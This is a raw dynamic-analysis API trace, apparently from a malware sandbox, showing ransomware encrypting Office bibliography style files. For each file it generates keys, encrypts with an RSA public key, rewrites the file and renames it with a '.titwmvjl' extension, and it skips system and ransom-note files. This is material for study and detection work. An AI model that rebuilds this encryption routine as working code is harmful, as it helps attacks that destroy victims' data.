[0071.474] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.474] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".XSL ") returned 5 [0071.474] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.474] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.475] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0071.475] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.475] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0071.486] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.486] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.486] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.487] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.487] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.487] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.487] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0071.487] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.488] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.488] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.488] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.488] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.488] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.489] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.489] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.489] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0071.489] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.489] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.489] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.489] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.489] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.490] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.490] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503938) returned 1 [0071.490] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.490] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.490] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.490] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.490] GetLastError () returned 0x0 [0071.490] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.490] CryptDestroyKey (hKey=0x503938) returned 1 [0071.490] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.491] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.491] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.491] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.491] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.491] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503478) returned 1 [0071.491] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.491] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.492] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.492] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.492] GetLastError () returned 0x0 [0071.492] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.492] CryptDestroyKey (hKey=0x503478) returned 1 [0071.492] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.492] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.492] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0071.492] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0071.493] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x351ea, lpOverlapped=0x0) returned 1 [0071.514] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffcae16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.514] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x351ea, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x351ea, lpOverlapped=0x0) returned 1 [0071.583] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.583] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0071.584] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.588] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.589] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.590] CloseHandle (hObject=0x2cc) returned 1 [0071.593] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl.titwmvjl"), dwFlags=0x1) returned 1 [0071.594] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.594] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.594] lstrcmpW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2=".") returned 1 [0071.594] lstrcmpW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="..") returned 1 [0071.594] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="MLASeventhEditionOfficeOnline.xsl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" [0071.594] lstrlenW (lpString=".titwmvjl") returned 9 [0071.594] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 100 [0071.594] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.594] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl.titwmvjl") returned 109 [0071.594] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 100 [0071.594] lstrlenW (lpString=".xsl") returned 4 [0071.594] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.594] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xsl ") returned 5 [0071.594] lstrcmpiW (lpString1=".xsl", lpString2=".titwmvjl") returned 1 [0071.594] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.595] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 100 [0071.595] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 100 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="desktop.ini") returned 1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="autorun.inf") returned 1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="ntuser.dat") returned -1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="iconcache.db") returned 1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="bootsect.bak") returned 1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="boot.ini") returned 1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="ntuser.dat.log") returned -1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="thumbs.db") returned -1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="KRAB-DECRYPT.html") returned 1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="CRAB-DECRYPT.html") returned 1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="KRAB-DECRYPT.txt") returned 1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="ntldr") returned -1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="NTDETECT.COM") returned -1 [0071.595] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="Bootfont.bin") returned 1 [0071.595] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 100 [0071.595] lstrlenW (lpString=".xsl") returned 4 [0071.595] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.595] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xsl ") returned 5 [0071.595] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.596] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.596] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0071.597] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.597] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0071.609] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.609] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.610] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.610] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.610] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.610] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.610] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0071.610] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.611] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.611] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.611] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.611] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.611] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.612] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.612] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.612] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0071.612] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.612] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.612] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.612] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.613] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.613] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.613] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503278) returned 1 [0071.613] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.613] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.613] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.614] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.614] GetLastError () returned 0x0 [0071.614] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.614] CryptDestroyKey (hKey=0x503278) returned 1 [0071.614] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.614] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.614] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.614] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.615] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.615] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503478) returned 1 [0071.615] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.615] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.615] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.615] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.615] GetLastError () returned 0x0 [0071.615] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.616] CryptDestroyKey (hKey=0x503478) returned 1 [0071.616] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.616] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.616] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0071.616] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0071.616] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x3e4f3, lpOverlapped=0x0) returned 1 [0071.639] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffc1b0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.639] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x3e4f3, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x3e4f3, lpOverlapped=0x0) returned 1 [0071.658] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.658] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0071.660] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.665] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.666] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.667] CloseHandle (hObject=0x2cc) returned 1 [0071.672] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl.titwmvjl"), dwFlags=0x1) returned 1 [0071.673] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.673] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.673] lstrcmpW (lpString1="SIST02.XSL", lpString2=".") returned 1 [0071.673] lstrcmpW (lpString1="SIST02.XSL", lpString2="..") returned 1 [0071.674] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="SIST02.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" [0071.674] lstrlenW (lpString=".titwmvjl") returned 9 [0071.674] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 77 [0071.674] VirtualAlloc (lpAddress=0x0, dwSize=0xda, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.674] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL.titwmvjl") returned 86 [0071.674] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 77 [0071.674] lstrlenW (lpString=".XSL") returned 4 [0071.674] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.674] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".XSL ") returned 5 [0071.674] lstrcmpiW (lpString1=".XSL", lpString2=".titwmvjl") returned 1 [0071.674] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.675] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 77 [0071.675] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 77 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="desktop.ini") returned 1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="autorun.inf") returned 1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="ntuser.dat") returned 1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="iconcache.db") returned 1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="bootsect.bak") returned 1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="boot.ini") returned 1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="ntuser.dat.log") returned 1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="thumbs.db") returned -1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="KRAB-DECRYPT.html") returned 1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="CRAB-DECRYPT.html") returned 1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="KRAB-DECRYPT.txt") returned 1 [0071.675] lstrcmpiW (lpString1="SIST02.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.676] lstrcmpiW (lpString1="SIST02.XSL", lpString2="ntldr") returned 1 [0071.676] lstrcmpiW (lpString1="SIST02.XSL", lpString2="NTDETECT.COM") returned 1 [0071.676] lstrcmpiW (lpString1="SIST02.XSL", lpString2="Bootfont.bin") returned 1 [0071.676] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 77 [0071.676] lstrlenW (lpString=".XSL") returned 4 [0071.676] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.676] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".XSL ") returned 5 [0071.676] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.676] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.676] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0071.677] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.677] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0071.678] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.679] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.679] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.679] VirtualAlloc 